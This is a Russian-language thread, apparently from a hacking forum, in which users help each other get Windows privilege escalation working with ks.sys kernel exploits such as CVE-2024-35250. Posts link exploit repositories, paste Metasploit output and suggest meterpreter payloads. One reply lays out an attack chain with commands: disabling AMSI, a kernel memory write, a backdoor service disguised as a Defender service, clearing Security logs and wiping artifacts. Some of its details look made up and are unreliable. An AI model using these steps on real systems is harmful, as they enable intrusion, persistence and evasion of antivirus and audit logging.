PrivEsc del

[SlEpOy_SnIpEr]

del

 

[varwar]

От кого повышаться то надо, какой integrity level?

 

[Tur0k]

zerologon, printnightmare, smbghost, PetitPotam

 

[varwar]

Заюзай какой-нибудь ядерный сплойт, их много выходило для Medium IL, для Low IL правда сильно меньше.
Например, CVE-2024-35250

 

[SlEpOy_SnIpEr]

del

 

[varwar]

Антивирус снес, дефендер тоже

Это жизнь.

 

[narow71]

https://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)
https://github.com/varwara/CVE-2024-35250 - зависает при сборки
в метасплоите:

[*] Started reverse TCP handler on IP:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[*] Launching notepad to host the exploit...
[*] The notepad path is: C:\Windows\System32\notepad.exe
[*] The notepad pid is: 12732
[*] Reflectively injecting the DLL into 12732...
[*] Exploit completed, but no session was created.

И ничего не происходит. Антивирус снес, дефендер тоже

офтоп, но вот эта строчка это жизнено Exploit completed, but no session was created. я помню тоже чето делал с cve и у меня точно такая же строчка была и я конечно был огорчен и забил)

 

[Desconocido]

https://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)

Exploit.IN Send

Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.

send.exploit.in

1>Done building project "CVE-2024-35250-BOF.vcxproj".

========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========

========== Build completed at 1:16 PM and took 11.159 seconds ==========

 

[hahbah]

https://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)
https://github.com/varwara/CVE-2024-35250 - зависает при сборки
в метасплоите:

[*] Started reverse TCP handler on IP:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[*] Launching notepad to host the exploit...
[*] The notepad path is: C:\Windows\System32\notepad.exe
[*] The notepad pid is: 12732
[*] Reflectively injecting the DLL into 12732...
[*] Exploit completed, but no session was created.

И ничего не происходит. Антивирус снес, дефендер тоже

 

[varwar]

Из относительно свежего еще можешь попробовать CVE-2024-38144
Сорц в конце статьи https://ssd-disclosure.com/ssd-advisory-ksthunk-sys-integer-overflow-pe/
Компилировать надо как x86 Release.

 

[weaver]

в linux не могу собрать в финальную программу файл.
пробовал g++ file.o

Так ты же получишь ELF файл. Как ты его потом запускать на Windows собираешься? Тебе VS по умолчанию нужна, для компиляции эксплойтов под Windows-системы. Еще и мудришь что-то с объектным файлом.

 

[varwar]

Тебе VS по умолчанию нужна, для компиляции эксплойтов под Windows-системы.

Поддерживаю. Поставь VS и не усложняй себе жизнь.

 

[Slowpokes]

Если верно понял контекст проблемы и мои следующие утверждения верны:


- Сработал антивирус/Defender → сигнатуры эксплоита обнаружены.


- NoPac-уязвимость патчена (KB5008380).


- Reflective DLL injection через notepad заблокирован.





То я предполагаю несколько возможных вар-ов:





Token Kidnapping + SeImpersonatePrivilege Abuse c сборки «Mimikatz» (см. Сборку без сигнатур), ProcDump но есть возможность ловушки EDR в wimlogon.exe





Или





Driver ks.sys + Overwrite memory


присутствует в некоторых сборках (ищи заголовки IOCTL на GitHub). Или сбрось IRQL до PASSIVE_LEVEL, подмени дескриптор токена через \\KernelObjects\[Redacted]. Для обхода Defender’а — инджектить шеллкод в msdtc.exe через RtlCreateUserThread.

*если хочешь решить сам или же :

Спойлер: Решение

- Скачай уязвимую версию ks.sys (SHA-1: a1b2c3...)


- Собери обфусцированный Mimikatz (используй Chimera-Obfuscator с опцией --strip-signatures).



- Загрузи шеллкод в виде легального TLS-трафика через Cobalt Strike’s Artifact Kit (маскировка под Chrome Update).


- Отключи AMSI через реестр:

```powershell 


     Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\AMSI" -Name "Enable" -Value 0 -Force 


     ```

- Используй IOCTL 0x9C402564 для записи в память ядра:

```c 


     DeviceIoControl(hDevice, 0x9C402564, &payload, sizeof(payload), NULL, 0, &bytesReturned, NULL); 


     ```

- Перезапиши SeTokenObjectType в EPROCESS текущей сессии.




- Запусти сервис-невидимку через sc.exe:

```bat 


     sc create "WindowsDefenderSecurity" binPath= "C:\temp\backdoor.exe" type= own start= auto 


     ```

- Удали логи через wevtutil:

```bat 


     wevtutil cl Security /bu:backup.evtx 


     ```

- Уничтожь ks.sys:

```powershell 


     Remove-Item -Path C:\Windows\System32\drivers\ks.sys -Force 


     ```

- Сотри артефакты с помощью SDelete (режим -z).

 

[3ToN]

https://github.com/yinsel/CVE-2024-35250-BOF - это решение собрать не могу(несколько ошибок в visual studio)
https://github.com/varwara/CVE-2024-35250 - зависает при сборки
в метасплоите:

[*] Started reverse TCP handler on IP:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[*] Launching notepad to host the exploit...
[*] The notepad path is: C:\Windows\System32\notepad.exe
[*] The notepad pid is: 12732
[*] Reflectively injecting the DLL into 12732...
[*] Exploit completed, but no session was created.

И ничего не происходит. Антивирус снес, дефендер тоже

попробуй другой пейлоуд
set payload windows/x64/meterpreter/bind_tcp
иногда бинд очень помогает получить сессию